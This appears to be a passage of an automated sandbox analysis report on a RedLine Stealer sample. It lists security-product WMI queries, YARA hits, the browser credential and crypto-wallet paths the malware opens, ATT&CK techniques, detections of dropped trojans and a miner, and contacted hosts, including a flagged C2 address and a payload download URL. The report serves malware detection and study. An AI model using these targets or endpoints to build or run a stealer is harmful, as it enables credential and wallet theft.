Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.hZDPlQwZ9D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hZDPlQwZ9D.exe.413788.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.294985121.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.294596055.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hZDPlQwZ9D.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5440, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: k2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: k6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 0000003A.00000002.581833879.00007FF9A5F80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fl.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: Yara match	File source: 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5440, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.hZDPlQwZ9D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hZDPlQwZ9D.exe.413788.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.294985121.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.294596055.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hZDPlQwZ9D.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5440, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Access Token Manipulation	21 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	11 Scheduled Task/Job	1 Windows Service	32 Obfuscated Files or Information	1 Input Capture	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	21 Command and Scripting Interpreter	Logon Script (Mac)	712 Process Injection	11 Software Packing	NTDS	235 System Information Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	11 Scheduled Task/Job	Network Logon Script	11 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	461 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	15 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Service Execution	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	1 PowerShell	Startup Items	Startup Items	222 Masquerading	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Modify Registry	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Access Token Manipulation	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	712 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hZDPlQwZ9D.exe	28%	Virustotal		Browse
hZDPlQwZ9D.exe	62%	ReversingLabs	Win32.Spyware.RedLine
hZDPlQwZ9D.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Avira	HEUR/AGEN.1213193
C:\Users\user\AppData\Local\Temp\54A0.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Windows\Temp\571D.tmp	100%	Avira	HEUR/AGEN.1213003
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Google\ofg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\54A0.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\fl.exe	100%	Joe Sandbox ML
C:\Windows\Temp\571D.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Google\brave.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\Local\Google\chrome.exe	65%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Google\ofg.exe	27%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\54A0.tmp	81%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Users\user\AppData\Local\Temp\fl.exe	54%	ReversingLabs	Win32.Trojan.Privateloader
C:\Windows\GoogleUpdate.exe	0%	ReversingLabs
C:\Windows\Temp\5528.tmp	45%	ReversingLabs	Win64.Trojan.CobaltStrike
C:\Windows\Temp\571D.tmp	65%	ReversingLabs	Win64.Trojan.Miner

Unpacked PE Files

Source	Detection	Scanner	Label	Download
57.0.dialer.exe.7ff670d40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
57.2.dialer.exe.7ff670d40000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
65.0.dllhost.exe.140000000.0.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
36.0.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
65.0.dllhost.exe.140000000.1.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
65.0.dllhost.exe.140000000.5.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
65.0.dllhost.exe.140000000.2.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
65.0.dllhost.exe.140000000.12.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
36.2.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
65.0.dllhost.exe.140000000.4.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
55.2.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
65.0.dllhost.exe.140000000.8.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
57.0.dialer.exe.7ff670d40000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
12.0.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
55.0.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
12.2.chrome.exe.870000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
65.0.dllhost.exe.140000000.10.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
65.0.dllhost.exe.140000000.3.unpack	100%	Avira	HEUR/AGEN.1251517	Download File
65.0.dllhost.exe.140000000.6.unpack	100%	Avira	HEUR/AGEN.1251517	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id19Responseon	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4y/	100%	URL Reputation	phishing
http://tempuri.org/Entity/Id22Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id3Response	0%	URL Reputation	safe
https://api.peer2profit.com/r2profit.com/	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get	0%	Avira URL Cloud	safe
https://api.peer2profit.com/6	0%	Avira URL Cloud	safe
http://www.idpminic.org4	0%	Avira URL Cloud	safe
https://api.peer2profit.com/a	0%	Avira URL Cloud	safe
https://api.peer2profit.com/(	0%	Avira URL Cloud	safe
45.10.55.124:47029	100%	Avira URL Cloud	malware
https://api.peer2profit.com/0l	0%	Avira URL Cloud	safe
https://api.peer2profit.com/r2profit.com/hy	0%	Avira URL Cloud	safe
http://www.idpminic.org	0%	Avira URL Cloud	safe
https://api.peer2profit.com/r2profit.com/	0%	Virustotal		Browse
https://api.peer2profit.com/api/proxy/nodes/get	0%	Virustotal		Browse
https://api.peer2profit.com/	0%	Avira URL Cloud	safe
https://studio.youtube.comSAPISIDHASH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.peer2profit.com	172.66.43.60	true	false	high
pool.hashvault.pro	95.179.241.203	true	false	high
idpminic.org	66.235.200.147	true	false	high
transfer.sh	144.76.136.153	true	false	high
www.idpminic.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.peer2profit.com/api/proxy/nodes/get	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://transfer.sh/get/frWBuE/123%20%282%29.exe	false		high
45.10.55.124:47029	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gcc.gnu.org/bugs/):	fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Responseon	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: phishing URL Reputation: phishing	unknown
http://tempuri.org/Entity/Id12Response	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/6	GoogleUpdate.exe, 00000025.00000003.490865222.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/a	GoogleUpdate.exe, 00000025.00000003.459624370.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000025.00000003.456448693.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/r2profit.com/	GoogleUpdate.exe, 00000025.00000003.466385494.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.505118459.0000024E3A241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.570055634.000001CD147D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://studio.youtube.com/reauth	fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	hZDPlQwZ9D.exe, hZDPlQwZ9D.exe, 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, hZDPlQwZ9D.exe, 00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.idpminic.org4	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/0l	GoogleUpdate.exe, 00000025.00000003.554160649.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	vbc.exe, 00000002.00000003.353833961.0000000007D71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454517081.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355271307.0000000007DF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.355355297.0000000007E0D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354438012.0000000007E56000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353730648.0000000007D54000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353211198.0000000007C85000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.354312159.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.353109229.0000000007C68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000003D.00000002.587396153.000001CD14D72000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/(	GoogleUpdate.exe, 00000025.00000003.511003595.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/r2profit.com/hy	GoogleUpdate.exe, 00000025.00000003.526216549.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.454709569.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	vbc.exe, 00000002.00000002.447729077.0000000006AE1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.idpminic.org	vbc.exe, 00000002.00000002.451663440.0000000006C0B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	vbc.exe, 00000002.00000002.453478134.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453382772.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.453073739.0000000006C81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
